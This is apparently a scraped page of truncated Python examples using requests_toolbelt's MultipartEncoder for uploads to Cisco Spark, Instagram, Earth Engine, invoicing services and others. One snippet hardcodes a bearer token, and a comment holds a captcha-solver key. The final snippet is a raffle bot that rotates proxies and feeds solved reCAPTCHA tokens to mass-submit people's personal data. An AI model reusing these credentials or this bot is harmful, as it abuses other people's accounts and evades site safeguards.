        monitor = MultipartEncoderMonitor(form, progress_callback)
        headers = {
            "Prefer": "respond-async",
            "Content-Type": monitor.content_type
        }

        session = requests.Session()
        response = session.post(url, headers=headers, data=monitor).content
        session.close()
        return self._return_bool_result(json.loads(response))
Пример #19
0
selected_user_file.close()

#Intergration with SPARK

filepath = '/home/debian/workingdir/Topolgyinfo.html'
filetype = 'text/html'
roomId = 'Y2lzY29zcGFyazovL3VzL1JPT00vNDk1OWQ4MzAtMThhNy0xMWU4LWI1MDktYjE2ZmRlMGU1M2Qx'
token = 'YjQ0NGJmMjctMWM5MS00NzI1LTkxZjgtZDFhZGI3MWI5MjY5NTc2NzRmMTYtODFh'
url = "https://api.ciscospark.com/v1/messages"

my_fields = {
    'roomId': roomId,
    'text': 'here is the latest Update of the Network',
    'files': ('Network Report', open(filepath, 'rb'), filetype)
}
m = MultipartEncoder(fields=my_fields)
r = requests.post(url,
                  data=m,
                  headers={
                      'Content-Type': m.content_type,
                      'Authorization': 'Bearer ' + token
                  })
filepath = '/home/debian/workingdir/EOSinfo.html'
my_fields = {
    'roomId': roomId,
    'text': 'here is the latest Update of the End Of Life/Support',
    'files': ('End of Support Infromation Report', open(filepath,
                                                        'rb'), filetype)
}
m = MultipartEncoder(fields=my_fields)
r = requests.post(url,
def test_avs_multipart_decoder():
    unhandled_directive = deepcopy(fixtures.speak_one_directive)
    unhandled_directive['directive']['header']['name'] = 'SomethingElse'

    multipart_response = MultipartEncoder(
        fields=[
            (
                'diretive-one',
                (
                    'directive-one',
                    json.dumps(fixtures.speak_one_directive),
                    'application/json',
                ),
            ),
            (
                'directive-two',
                (
                    'directive-two',
                    json.dumps(fixtures.play_one_directive),
                    'application/json',
                ),
            ),
            (
                'directive-three',
                (
                    'directive-three',
                    json.dumps(fixtures.expect_speech_directive),
                    'application/json',
                ),
            ),
            (
                'directive-four',
                (
                    'directive-four',
                    json.dumps(unhandled_directive),
                    'application/json',
                ),
            ),
            (
                'directive-five',
                (
                    'directive-five',
                    fixtures.audio_response_data,
                    'application/octet-stream',
                    {
                        'Content-ID':
                        '<DailyBriefingPrompt.ChannelIntroduction.5c4c5f3e-0c0f-4dac-b0e0-ba70065b8bc0:Say:DAILYBRIEFING:DailyBriefingIntroduction_1708175498>'
                    },  # noqa
                )),
            (
                'directive-six',
                (
                    'directive-six',
                    fixtures.audio_response_data,
                    'application/octet-stream',
                    {
                        'Content-ID':
                        '<DeviceTTSRenderer_bf8529e6-0708-4ac3-93a0-e57b0aff5ef4_1934409815>'
                    },  # noqa
                ))
        ], )

    response = mock.Mock(
        headers={
            'access-control-allow-origin': '*',
            'x-amzn-requestid': '06aaf3fffec6be28-00003161-00006c28',
            'content-type': [bytes(multipart_response.content_type, 'utf8')],
        },
        **{'read.return_value': multipart_response.to_string()},
    )

    directives = helpers.AVSMultipartDecoder(response=response).directives

    directive = next(directives)
    assert directive.name == 'Speak'
    assert isinstance(directive, helpers.SpeakDirective)

    directive = next(directives)
    assert directive.name == 'Play'
    assert isinstance(directive, helpers.PlayDirective)

    directive = next(directives)
    assert directive.name == 'ExpectSpeech'
    assert isinstance(directive, helpers.ExpectSpeechDirective)

    directive = next(directives)
    assert directive.name == 'SomethingElse'
    assert isinstance(directive, helpers.Directive)
Пример #21
0
    def go_on_run(self,i):
        pass_count = []
        fail_count = []
        request_data_file = ''
        res = None
        # 获取用例数
        rows_count = self.data.get_case_lines()
        # 第一行索引为0
        # for i in range(1, rows_count):
        is_run = self.data.get_is_run(i)
        if is_run:
            url = self.data.get_request_url(i)
            method = self.data.get_request_method(i)
            #request_data = json.load(self.data.get_request_data(i))
            expect = self.data.get_expcet_data(i)
            token = self.data.is_token(i)
            depend_case = self.data.is_depend(i)
            headers= self.data.get_headers(i)
            r = self.data.get_request_data(i)
            self.data.write_respond_data(i, '')#清空响应信息


            # 上传文件处理
            if r!=None:
                if r.endswith('jpg')| r.endswith('png')| r.endswith('docx')| r.endswith('doc')| r.endswith('ppt')| r.endswith('pptx'):#其他文件暂不考虑
                    log().info('读取上传文件')
                    file_payload = {'file': (r, open('../' + r, 'rb'))}#, "image/jpg"
                    m = MultipartEncoder(file_payload)
                    headers['Content-Type'] = m.content_type
                    request_data = m
                    log().info('生成上传文件Multipart')
                #处理依赖
                elif depend_case != None:
                    self.depend_data = DependentData(depend_case)
                    # 获取依赖key和value [id1:3]
                    depend_response_data = self.depend_data.get_data_for_key(i)  # {caseid:{id1:1,id2:2}}
                    for caseid in depend_response_data:
                        for k in depend_response_data[caseid]:
                            y = '${' + caseid + ',' + k + '}'
                            if r.find(y):
                                t = r.replace(y, str(depend_response_data[caseid][k]))
                                r = t
                    log().info('依赖(最终)请求拼接完成\n%s', r)
                    request_data = json.loads(r, encoding='utf-8')

                else:# 没有依赖直接转换输出
                        log().info('获取没有依赖的请求参数\n%s',r)
                        request_data =json.loads(r,encoding='utf-8')

            else:
                request_data={}

            # 如果token字段值为write则将该接口的返回的token写入到token.json文件,如果为yes则读取token.json文件
            if token == "write":
                log().info('写入token')
                res = self.run_method.run_main(method, url,request_data,headers)
                op_header = OperationHeader(res)
                op_header.write_token()
            elif token == 'yes':
                op_json = OperationJson("../dataconfig/token.json")
                token = op_json.get_data('data')
                log().info("获取token\n%s",token)
                headers.update(token)
                #request_data = dict(request_data, **token)  # 把请求数据与登录token合并,并作为请求数据
                res = self.run_method.run_main(method, url,request_data,headers)

            else:

                res = self.run_method.run_main(method, url,request_data,headers)
            log().info("响应结果\n%s", res)
            self.data.write_respond_data(i, res)

            if expect != None:
                if self.com_util.is_contain(expect, res):
                    self.data.write_result(i, "Pass")
                    pass_count.append(i)

                else:
                    self.data.write_result(i, "failed")
                    fail_count.append(i)

            else:

                log().error('用例ID:case-%s,预期结果不能为空',i)

            return res
Пример #22
0
 # ambil semua nama pasar
 option = BeautifulSoup(get_cookie.content, 'lxml')
 option = option.find_all('option')
 PASARAN = [a['value'] for a in option]
 # ambil cookie buat request
 cookies = get_cookie.cookies.get_dict()
 names = [f'{k}={v};'for k, v in cookies.items()]
 COOKIE = ''.join(names)
 kumpulan_param = []
 dari = input('FROM: YYYY-mm-dd\nCONTOH:2020-03-01\n>')
 sampai = input('TO: YYYY-mm-dd\nCONTOH:2020-03-18\n>')
 print('pastikan tanggal sampai > tanggal')
 for pasar in PASARAN:
     params=MultipartEncoder({
         "JessicaVe48": cookies['ArfNet48'],
         "from-tbl": dari,
         "to-tbl": sampai,
         "psr-tbl": pasar})
     headers = {
         "Host": "disperdagin.surabaya.go.id",
         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36",
         "Accept": "application/json, text/javascript, */*; q=0.01",
         "Content-Length": "42",
         "Accept-Language": "en-US,en;q=0.5",
         "Accept-Encoding": "gzip, deflate",
         "Referer": "http://disperdagin.surabaya.go.id/bahanpokok/tabel",
         # masalah utama saya, dia gak ngerequests json kayak website biasanya tapi pake this f*****g multipar/form-data, jadi harus di "convert" dulu
         "Content-Type": params.content_type,
         "Cookie": COOKIE,
         "DNT": "1",
         "X-Requested-With": "XMLHttpRequest",
Пример #23
0
def facturar(contrato_id, descripcion=None, sub_total=None):
    logger.info('Task facturar iniciada')

    # Configurar redondeo
    getcontext().rounding = ROUND_HALF_UP

    # Calcular fecha actual
    fecha = timezone.localtime()

    # Consultar contrato
    contrato = models.Contrato.objects.get(id=contrato_id)

    # Si no se envia descripcion factura el mes correspondiente a la fecha actual
    if descripcion is None:
        sub_total = contrato.precio_mensual
        descripcion = u'Renta correspondiente al mes {0} del {1} {2}'.format(
            nombre_mes(fecha.month), fecha.year, contrato.nombre_predio)

    # Calcular impuestos
    iva_tra = (sub_total * Decimal('0.160000')).quantize(TWO_PLACES)
    iva_ret = Decimal('0.00')
    isr_ret = Decimal('0.00')

    if contrato.retener_impuestos:
        iva_ret = (sub_total * Decimal('0.106666')).quantize(TWO_PLACES)
        isr_ret = (sub_total * Decimal('0.100000')).quantize(TWO_PLACES)

    total_tra = iva_tra
    total_ret = (iva_ret + isr_ret).quantize(TWO_PLACES)
    total = ((sub_total + total_tra) - total_ret).quantize(TWO_PLACES)

    # Cargar certificado CSD
    cer = X509.load_cert(settings.CSD_CER, X509.FORMAT_DER)

    # Cargar llave privada CSD
    key = RSA.load_key(settings.CSD_KEY)

    # Obtener numero de serie
    serial_number = '{:x}'.format(int(cer.get_serial_number())).decode('hex')

    # Obtener folio
    folio_conf = models.Configuracion.objects.get(nombre='U_FOLIO')
    folio_conf.valor = folio_conf.valor + 1
    folio_conf.save()

    nsmap = {
        'cfdi': 'http://www.sat.gob.mx/cfd/3',
        'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
    }

    attrib = {
        '{http://www.w3.org/2001/XMLSchema-instance}schemaLocation':
        'http://www.sat.gob.mx/cfd/3'
    }

    # Nodo cfdi:Comprobante
    cfdi = etree.Element('{http://www.sat.gob.mx/cfd/3}Comprobante',
                         nsmap=nsmap,
                         attrib=attrib)

    cfdi.set('Version', '3.3')
    cfdi.set('Serie', settings.SERIE)
    cfdi.set('Folio', str(folio_conf.valor))
    cfdi.set('Fecha', fecha.isoformat()[:19])
    cfdi.set('FormaPago', contrato.forma_pago)
    cfdi.set('NoCertificado', serial_number)
    cfdi.set('Certificado', base64.b64encode(cer.as_der()))
    cfdi.set('SubTotal', '{}'.format(sub_total))
    cfdi.set('Moneda', settings.MONEDA)
    cfdi.set('Total', '{}'.format(total))
    cfdi.set('TipoDeComprobante', 'I')
    cfdi.set('MetodoPago', contrato.metodo_pago)
    cfdi.set('LugarExpedicion', settings.CODIGO_POSTAL)

    # Nodo cfdi:Emisor
    emisor = etree.SubElement(cfdi, '{http://www.sat.gob.mx/cfd/3}Emisor')
    emisor.set('Rfc', settings.RFC)
    emisor.set('Nombre', settings.RAZON_SOCIAL)
    emisor.set('RegimenFiscal', settings.REGIMEN_FISCAL)

    # Nodo cfdi:Receptor
    receptor = etree.SubElement(cfdi, '{http://www.sat.gob.mx/cfd/3}Receptor')
    receptor.set('Rfc', contrato.rfc_cliente)
    receptor.set('Nombre', contrato.nombre_cliente)
    receptor.set('UsoCFDI', contrato.uso_cfdi)

    # Nodo cfdi:Conceptos
    conceptos = etree.SubElement(cfdi,
                                 '{http://www.sat.gob.mx/cfd/3}Conceptos')

    # Nodo cfdi:Concepto
    concepto = etree.SubElement(conceptos,
                                '{http://www.sat.gob.mx/cfd/3}Concepto')
    concepto.set('ClaveProdServ', settings.CLAVE_PROD_SERV)
    concepto.set('Cantidad', '1')
    concepto.set('ClaveUnidad', settings.CLAVE_UNIDAD)
    concepto.set('Descripcion', descripcion)
    concepto.set('ValorUnitario', '{}'.format(sub_total))
    concepto.set('Importe', '{}'.format(sub_total))

    # Nodo cfdi:Impuestos
    impuestos = etree.SubElement(concepto,
                                 '{http://www.sat.gob.mx/cfd/3}Impuestos')

    # Nodo cfdi:Traslados
    traslados = etree.SubElement(impuestos,
                                 '{http://www.sat.gob.mx/cfd/3}Traslados')

    # Nodo cfdi:Traslado
    traslado = etree.SubElement(traslados,
                                '{http://www.sat.gob.mx/cfd/3}Traslado')
    traslado.set('Base', '{}'.format(sub_total))
    traslado.set('Impuesto', '002')
    traslado.set('TipoFactor', 'Tasa')
    traslado.set('TasaOCuota', '0.160000')
    traslado.set('Importe', '{}'.format(iva_tra))

    if contrato.retener_impuestos:
        # Nodo cfdi:Retenciones
        retenciones = etree.SubElement(
            impuestos, '{http://www.sat.gob.mx/cfd/3}Retenciones')

        # Nodo cfdi:Retencion IVA
        traslado = etree.SubElement(retenciones,
                                    '{http://www.sat.gob.mx/cfd/3}Retencion')
        traslado.set('Base', '{}'.format(sub_total))
        traslado.set('Impuesto', '002')
        traslado.set('TipoFactor', 'Tasa')
        traslado.set('TasaOCuota', '0.106666')
        traslado.set('Importe', '{}'.format(iva_ret))

        # Nodo cfdi:Retencion ISR
        retencion = etree.SubElement(retenciones,
                                     '{http://www.sat.gob.mx/cfd/3}Retencion')
        retencion.set('Base', '{}'.format(sub_total))
        retencion.set('Impuesto', '001')
        retencion.set('TipoFactor', 'Tasa')
        retencion.set('TasaOCuota', '0.100000')
        retencion.set('Importe', '{}'.format(isr_ret))

    if contrato.cuenta_predial is not None:
        cuenta_predial = etree.SubElement(
            concepto, '{http://www.sat.gob.mx/cfd/3}CuentaPredial')
        cuenta_predial.set('Numero', str(contrato.cuenta_predial))

    # Nodo cfdi:Impuestos
    impuestos = etree.SubElement(cfdi,
                                 '{http://www.sat.gob.mx/cfd/3}Impuestos')
    impuestos.set('TotalImpuestosTrasladados', '{}'.format(total_tra))

    if contrato.retener_impuestos:
        impuestos.set('TotalImpuestosRetenidos', '{}'.format(total_ret))

        # Nodo cfdi:Retenciones
        retenciones = etree.SubElement(
            impuestos, '{http://www.sat.gob.mx/cfd/3}Retenciones')

        # Nodo cfdi:Retencion IVA
        retencion_iva = etree.SubElement(
            retenciones, '{http://www.sat.gob.mx/cfd/3}Retencion')
        retencion_iva.set('Impuesto', '002')
        retencion_iva.set('Importe', '{}'.format(iva_ret))

        # Nodo cfdi:Retencion ISR
        retencion_isr = etree.SubElement(
            retenciones, '{http://www.sat.gob.mx/cfd/3}Retencion')
        retencion_isr.set('Impuesto', '001')
        retencion_isr.set('Importe', '{}'.format(isr_ret))

    # Nodo cfdi:Traslados
    traslados = etree.SubElement(impuestos,
                                 '{http://www.sat.gob.mx/cfd/3}Traslados')

    # Nodo cfdi:Traslado
    traslado_iva = etree.SubElement(traslados,
                                    '{http://www.sat.gob.mx/cfd/3}Traslado')
    traslado_iva.set('Impuesto', '002')
    traslado_iva.set('TipoFactor', 'Tasa')
    traslado_iva.set('TasaOCuota', '0.160000')
    traslado_iva.set('Importe', '{}'.format(iva_tra))

    # Cargar xslt para generar cadena original
    xslt = etree.XSLT(etree.parse(settings.PATH_XLST))

    # Generar cadena original
    cadena_original = xslt(cfdi)

    # sacar hash a cadena original
    digest = hashlib.new('sha256', str(cadena_original)).digest()

    # Firmar digest de cadena original
    sign = key.sign(digest, "sha256")

    # Pasar sello de Bytes a b64
    sello = base64.b64encode(sign)

    # Agrefar sello a documento xml
    cfdi.set('Sello', sello)

    # Generar archivo xml
    xml = etree.tostring(cfdi, pretty_print=True)

    # Format token
    token = 'bearer %s' % str(settings.PAC_TOKEN)

    # Crear mensaje multiparte para adjuntar archivo
    m = MultipartEncoder(fields={
        'xml': ('xml', xml, 'text/xml', {
            'Content-Transfer-Encoding': 'binary'
        })
    })

    # Crear headers
    headers = {'Content-Type': m.content_type, 'Authorization': token}

    # Realizar request tipo post al pac
    req = requests.post(settings.PAC_URL, headers=headers, data=m.to_string())

    # Verificar request
    if req.status_code != 200:
        raise Exception(u'id_contrato: {} Error {}'.format(
            contrato.id, req.json()))

    # Extraer xml
    xml_timbrado = req.json()['data']['cfdi'].encode('utf-8')

    # Parsear XML timpado
    cfdi_timbrado = etree.fromstring(xml_timbrado)

    # Buscar UUID
    uuid = cfdi_timbrado.find('{http://www.sat.gob.mx/cfd/3}Complemento').find(
        '{http://www.sat.gob.mx/TimbreFiscalDigital}TimbreFiscalDigital'
    ).attrib.get('UUID')

    # Generar PDF
    xml_dict = xmltodict.parse(xml_timbrado)['cfdi:Comprobante']

    cbb_url = 'https://verificacfdi.facturaelectronica.sat.gob.mx/' \
              'default.aspx?id={0}re={1}&rr={2}&tt={3}&fe={4}'.format(
        uuid,
        settings.RFC,
        contrato.rfc_cliente,
        total,
        sello[(len(sello) - 8):],
    )

    # Generar codigo qr de cbb
    qrdata = qrcode.make(cbb_url)
    raw = StringIO()
    qrdata.save(raw)
    cbb = b64encode(raw.getvalue())

    # Renderizar HTML
    html = get_template('webapp/factura-pdf.html').render({
        'xml': xml_dict,
        'cadena_original': cadena_original,
        'cbb': cbb,
    })

    # Generar PDF
    pdf = pdfkit.from_string(html,
                             False,
                             options={
                                 'page-size': 'Letter',
                                 'encoding': "UTF-8",
                                 'quiet': '',
                             })

    # Guardar factura en base de datos
    factura = models.Factura()
    factura.fecha = fecha
    factura.contrato = contrato
    factura.uuid = uuid
    factura.serie = settings.SERIE
    factura.folio = folio_conf.valor
    factura.nombre_cliente = contrato.nombre_cliente
    factura.rfc_cliente = contrato.rfc_cliente
    factura.correo_cliente = contrato.correo_cliente
    factura.concepto = descripcion
    factura.sub_total = sub_total
    factura.iva_trasladado = iva_tra
    factura.iva_retenido = iva_ret
    factura.isr_retenido = isr_ret
    factura.total = total
    factura.xml = ContentFile(xml_timbrado, name='{0}.xml'.format(uuid))
    factura.pdf = ContentFile(pdf, name='{0}.pdf'.format(uuid))
    factura.save()

    # sumar saldo en contrato
    contrato.saldo_contrato = contrato.saldo_contrato + total
    contrato.save()

    # Enviar correo
    html_email = get_template('webapp/factura-correo.txt').render(
        {'factura': factura})

    msg = EmailMessage('{} Nueva Factura {} {} Generada'.format(
        settings.RAZON_SOCIAL, factura.serie, factura.folio),
                       html_email,
                       settings.DEFAULT_FROM_EMAIL,
                       to=[factura.correo_cliente],
                       reply_to=[settings.TENANT_EMAIL],
                       cc=[settings.TENANT_EMAIL])
    msg.attach('{}_{}.xml'.format(factura.serie, factura.folio),
               factura.xml.read(), 'application/xml')
    msg.attach('{}_{}.pdf'.format(factura.serie, factura.folio),
               factura.pdf.read(), 'application/pdf')
    msg.send()

    logger.info('Task facturar terminada')

    return factura.id
Пример #24
0
def create_articles(title,
                    type,
                    content,
                    account_id=None,
                    attention_period_in_days=None):
    """
    Create articles.

        reference
        - `Common Message Property <https://developers.worksmobile.com/jp/document/100180301?lang=en>`_
    """

    headers = {"charset": "UTF-8", "consumerKey": OPEN_API["consumerKey"]}

    board_no = get_value("{type}board".format(type=type), None)
    if board_no is None:
        logging.error("create articles. board no is None.")
        raise HTTPError(500, "create articles. board no is None.")

    body = {
        "title": title,
        "body": content,
        "boardNo": board_no,
        "domainId": DOMAIN_ID,
        "sendCreatedNotify": True,
        "useComment": True
    }

    if account_id is not None:
        body["accountId"] = account_id

    if attention_period_in_days is not None:
        body["attentionPeriodInDays"] = attention_period_in_days

    multi1 = MultipartEncoder(fields={"article": (None, json.dumps(body))})

    headers['content-type'] = multi1.content_type
    boards_url = API_BO["home"]["create_articles_url"]

    response = auth_post(boards_url, data=multi1, headers=headers)

    if response.status_code != 200 or response.content is None:
        logging.info(
            "create articles failed. url:%s text:%s headers:%s body:%s",
            boards_url, response.text, json.dumps(headers), multi1.to_string())
        if response.status_code == 400:
            logging.error(
                "create articles failed. url:%s text:%s headers:%s body:%s",
                boards_url, response.text, json.dumps(headers),
                json.dumps(body))
            return create_articles_failed()
        if response.status_code == 507:
            return storage_lack()
        logging.error(
            "create articles failed. url:%s text:%s headers:%s body:%s",
            boards_url, response.text, json.dumps(headers), multi1.to_string())
        raise HTTPError(500, "create articles. http return code error.")

    tmp_req = json.loads(response.content)
    article_no = tmp_req.get("articleNo", None)
    if article_no is None:
        logging.error("create articles failed. url:%s text:%s", boards_url,
                      response.text)
        raise HTTPError(500, "create articles. article no is None.")
    return None
Пример #25
0
    def upload(self,
               video_file,
               title,
               description,
               categories,
               tags,
               is_private,
               callback=None,
               session=None,
               proxy=None,
               **kwargs):

        session = session or self.http_settings.session
        proxy = proxy or self.http_settings.proxy

        no_tags = kwargs.get('no_tags', False)
        add_content_source_id = kwargs.get('add_content_source_id', False)

        my_video_upload_url = 'http://www.{domain}/my_video_upload/'.format(
            domain=self.domain)

        go_to_upload = session.get(my_video_upload_url, proxies=proxy)

        doc = etree.fromstring(go_to_upload.content, HTMLParser())

        filehash = self._upload_video(video_file, callback, session, proxy)

        fields = []
        if add_content_source_id:
            found_content_source_id = doc.xpath(
                '//input[@name="content_source_id"]/@value')
            if not found_content_source_id:
                raise NginxUploaderProblem(
                    'Cannot find required variable content_source_id')
            content_source_id = found_content_source_id[0]
            fields.append(('content_source_id', str(content_source_id)))

        if not no_tags:
            fields.append(('tags', str(",".join([tag for tag in tags]))))
        fields.append(('action', 'add_new_complete'))
        fields.append(('title', str(title)))
        fields.append(('description', str(description)))
        fields.append(('file', str(path.Path(video_file).name)))
        fields.append(('file_hash', str(filehash)))
        fields.append(('is_private', "1" if is_private else "0"))

        for category in categories:
            fields.append(('category_ids[]', str(category)))
        encoder = MultipartEncoder(fields)

        if callback:
            monitor = MultipartEncoderMonitor(encoder, callback)
        else:
            monitor = MultipartEncoderMonitor(encoder)

        #my_video_upload_url = 'http://httpbin.org/post'
        submit_video = session.post(
            my_video_upload_url,
            data=monitor,
            proxies=proxy,
            headers={'Content-Type': monitor.content_type})
    def uploadVideo(self,
                    video,
                    caption=None,
                    upload_id=None,
                    frame_time_thumbnail=0):
        '''
        Uploads a video to Instagram creating in the process a thumbnail at the frame_time_thumbnail time
        '''
        if upload_id is None:
            upload_id = str(int(time.time() * 1000))
        data = {
            'upload_id': upload_id,
            '_csrftoken': self.token,
            'media_type': '2',
            '_uuid': self.uuid,
        }
        m = MultipartEncoder(data, boundary=self.uuid)
        self.s.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Host': 'i.instagram.com',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': m.content_type,
            'Connection': 'keep-alive',
            'User-Agent': self.USER_AGENT
        })
        response = self.s.post(self.API_URL + "upload/video/",
                               data=m.to_string())
        if response.status_code == 200:
            body = json.loads(response.text)
            upload_url = body['video_upload_urls'][3]['url']
            upload_job = body['video_upload_urls'][3]['job']

            videoData = open(video, 'rb').read()
            request_size = math.floor(len(videoData) / 4)
            lastRequestExtra = (len(videoData) - (request_size * 3))

            headers = copy.deepcopy(self.s.headers)
            self.s.headers.update({
                'X-IG-Capabilities': '3Q4=',
                'X-IG-Connection-Type': 'WIFI',
                'Cookie2': '$Version=1',
                'Accept-Language': 'en-US',
                'Accept-Encoding': 'gzip, deflate',
                'Content-type': 'application/octet-stream',
                'Session-ID': upload_id,
                'Connection': 'keep-alive',
                'Content-Disposition': 'attachment; filename="video.mov"',
                'job': upload_job,
                'Host': 'upload.instagram.com',
                'User-Agent': self.USER_AGENT
            })
            for i in range(0, 4):
                start = i * request_size
                if i == 3:
                    end = i * request_size + lastRequestExtra
                else:
                    end = (i + 1) * request_size
                length = lastRequestExtra if i == 3 else request_size
                content_range = "bytes {start}-{end}/{lenVideo}".format(
                    start=start, end=(end - 1),
                    lenVideo=len(videoData)).encode('utf-8')

                self.s.headers.update({
                    'Content-Length': str(end - start),
                    'Content-Range': content_range,
                })
                response = self.s.post(upload_url,
                                       data=videoData[start:start + length])
            self.s.headers = headers

            if response.status_code == 200:
                if self.configureVideo(upload_id, video, frame_time_thumbnail,
                                       caption):
                    self.expose()
                    return True
        return False
Пример #27
0
def seltabup(dirc, uname, destination):
    ee.Initialize()
    for (root, directories, files) in os.walk(dirc):
        for filename in files:
            if filename.endswith(".zip"):
                table_exists.append(filename.split(".zip")[0])
    try:
        destination_info = ee.data.getAsset(destination + "/")
        full_path_to_collection = destination_info["name"]
        if destination_info["name"] and destination_info["type"].lower(
        ) == "folder":
            print("Folder exists: {}".format(destination_info["id"]))
            children = ee.data.listAssets({"parent": full_path_to_collection})
            for child in children["assets"]:
                gee_table_exists.append(child["id"].split("/")[-1])
    except Exception as e:
        full_path_to_collection = (destination.rsplit("/", 1)[0] + "/" +
                                   destination.split("/")[-1])
        print("Creating a folder {}".format(full_path_to_collection))
        try:
            ee.data.createAsset({"type": ee.data.ASSET_TYPE_FOLDER_CLOUD},
                                full_path_to_collection)
        except:
            ee.data.createAsset({"type": ee.data.ASSET_TYPE_FOLDER},
                                full_path_to_collection)
    diff_set = set(table_exists) - set(gee_table_exists)
    if len(diff_set) != 0:
        options = Options()
        options.add_argument("-headless")
        passw = getpass.getpass()
        if os.name == "nt":
            driver = Firefox(executable_path=os.path.join(
                lp, "geckodriver.exe"),
                             options=options)
        else:
            driver = Firefox(executable_path=os.path.join(lp, "geckodriver"),
                             options=options)
        try:
            # Using stackoverflow for third-party login & redirect
            driver.get(
                "https://stackoverflow.com/users/signup?ssrc=head&returnurl=%2fusers%2fstory%2fcurrent%27"
            )
            time.sleep(5)
            driver.find_element_by_xpath(
                '//*[@id="openid-buttons"]/button[1]').click()
            time.sleep(5)
            driver.find_element_by_xpath('//input[@type="email"]').send_keys(
                uname)
            driver.find_element_by_xpath("//div[@id='identifierNext']").click()
            time.sleep(5)
            driver.find_element_by_xpath(
                '//input[@type="password"]').send_keys(passw)
            driver.find_element_by_xpath('//*[@id="passwordNext"]').click()
            time.sleep(5)
            driver.get("https://code.earthengine.google.com")
            time.sleep(8)
        except Exception as e:
            print(e)
            driver.close()
            sys.exit("Failed to setup & use selenium")
        cookies = driver.get_cookies()
        s = requests.Session()
        for cookie in cookies:
            s.cookies.set(cookie["name"], cookie["value"])
        driver.close()
        auth_check = s.get("https://code.earthengine.google.com")
        if auth_check.status_code == 200:
            try:
                i = 1
                file_count = len(diff_set)
                for item in list(diff_set):
                    full_path_to_table = os.path.join(root, item + ".zip")
                    file_name = item + ".zip"
                    asset_full_path = full_path_to_collection + "/" + item.split(
                        ".")[0]
                    r = s.get(
                        "https://code.earthengine.google.com/assets/upload/geturl"
                    )
                    d = ast.literal_eval(r.text)
                    upload_url = d["url"]
                    with open(full_path_to_table, "rb") as f:
                        upload_url = d["url"]
                        try:
                            m = MultipartEncoder(
                                fields={"zip_file": (file_name, f)})
                            resp = s.post(
                                upload_url,
                                data=m,
                                headers={"Content-Type": m.content_type},
                            )
                            gsid = resp.json()[0]
                            asset_full_path = (full_path_to_collection + "/" +
                                               item.split(".")[0])
                            main_payload = {
                                "name":
                                asset_full_path,
                                "sources": [{
                                    "charset": "UTF-8",
                                    "maxErrorMeters": 1,
                                    "maxVertices": 1000000,
                                    "uris": [gsid],
                                }],
                            }
                            with open(os.path.join(lp, "data.json"),
                                      "w") as outfile:
                                json.dump(main_payload, outfile)
                            output = subprocess.check_output(
                                "earthengine upload table --manifest " + '"' +
                                os.path.join(lp, "data.json") + '"',
                                shell=True,
                            )
                            print(
                                "Ingesting " + str(i) + " of " +
                                str(file_count) + " " +
                                str(os.path.basename(asset_full_path)) +
                                " Task Id: " +
                                output.decode("ascii").strip().split(" ")[-1])
                        except Exception as e:
                            print(e)
                        i = i + 1
            except Exception as e:
                print(e)
            except (KeyboardInterrupt, SystemExit) as e:
                sys.exit("Program escaped by User")
        else:
            print("Authentication Failed for GEE account")
    elif len(diff_set) == 0:
        print("All assets already copied")
Пример #28
0
def main():

    with open('Stat1.csv') as file:
        reader = csv.DictReader(file)
        count = 0
        for row in reader:
            try:
                if count == 0:
                    print("Pagina Caricata")
                    count += 1

                proxies = {
                    "http":
                    "http://" + row['User'] + ":" + row['Auth'] + "@" +
                    row['IP'] + ":" + row['Port'] + "/",
                    "https":
                    "http://" + row['User'] + ":" + row['Auth'] + "@" +
                    row['IP'] + ":" + row['Port'] + "/"
                }

                headers1 = {
                    'User-Agent':
                    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
                }

                with requests.Session() as session:
                    url = 'https://www.statuto18.com/DunkHighMaizeBlue'

                    res = requests.get(url, proxies=proxies, headers=headers1)
                    soup = BeautifulSoup(res.text, 'html.parser')

                    day = soup.select_one(
                        'input.form-control:nth-child(3)').get('name')
                    month = soup.select_one(
                        'input.form-control:nth-child(4)').get('name')
                    year = soup.select_one(
                        'input.form-control:nth-child(5)').get('name')
                    cf = soup.select_one(
                        'input.form-control:nth-child(9)').get('name')

                    if not day or not month or not year or not cf:
                        print("Empty field: day/month/year/cf")
                        continue

                    # solver = recaptchaV2Proxyless()
                    # solver.set_verbose(1)
                    # solver.set_key("bef80b4f70976b0452b83cddf6f9b152")
                    # solver.set_website_url(url)
                    # solver.set_website_key("6LdrtrgUAAAAAAAio3UhHrVdJUQXpP3vfbcFm3qx")
                    # g_response = solver.solve_and_return_solution()
                    # if g_response != 0:
                    #     print("g-response: " + g_response)
                    # else:
                    #     print("task finished with error " + solver.error_code)

                    while queue.empty():
                        time.sleep(0.1)
                    g_response = queue.get()
                    form_data = {
                        'nome2': row['Nome'],
                        'cognome2': row['Cognome'],
                        day: row['Giorno'],
                        month: row['Mese'],
                        year: row['Anno'],
                        'telefono2': row['Telefono'],
                        'email2': row['Mail'],
                        'email_conf2': row['Mail'],
                        cf: row['CF'],
                        'comune2': row['Comune'],
                        'provincia2': row['Provincia'],
                        'paese2': 'IT',
                        'sesso2': row['Sesso'],
                        'taglia2': row['Taglia'],
                        'check2': 'S',
                        'captcha2': 'undefined',
                        'campagna2': 'DunkHighMaizeBlue',
                        'form': 'registra',
                        'mark': 'S',
                        'cessione': 'S',
                        'g-recaptcha-response': g_response,
                        'action': 'trueins'
                    }

                    m = MultipartEncoder(
                        fields=form_data,
                        boundary='----WebKitFormBoundary' + ''.join(
                            random.sample(string.ascii_letters + string.digits,
                                          16)))

                    headers2 = {
                        "Content-Type":
                        m.content_type,
                        'Cookie':
                        'PHPSESSID=' + res.cookies.get('PHPSESSID'),
                        'User-Agent':
                        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
                    }

                    # print(form_data)

                    r = session.post(url,
                                     data=m,
                                     headers=headers2,
                                     proxies=proxies)

                    soup = BeautifulSoup(r.text, 'lxml')
                    thank = soup.find("div", id="content-thankyou")
                    if thank == None:
                        print(row['Mail'], "non entrata")
                        text_file = open("ST1.txt", "a")
                        text_file.write(row['Cognome'])
                        text_file.write('\n')
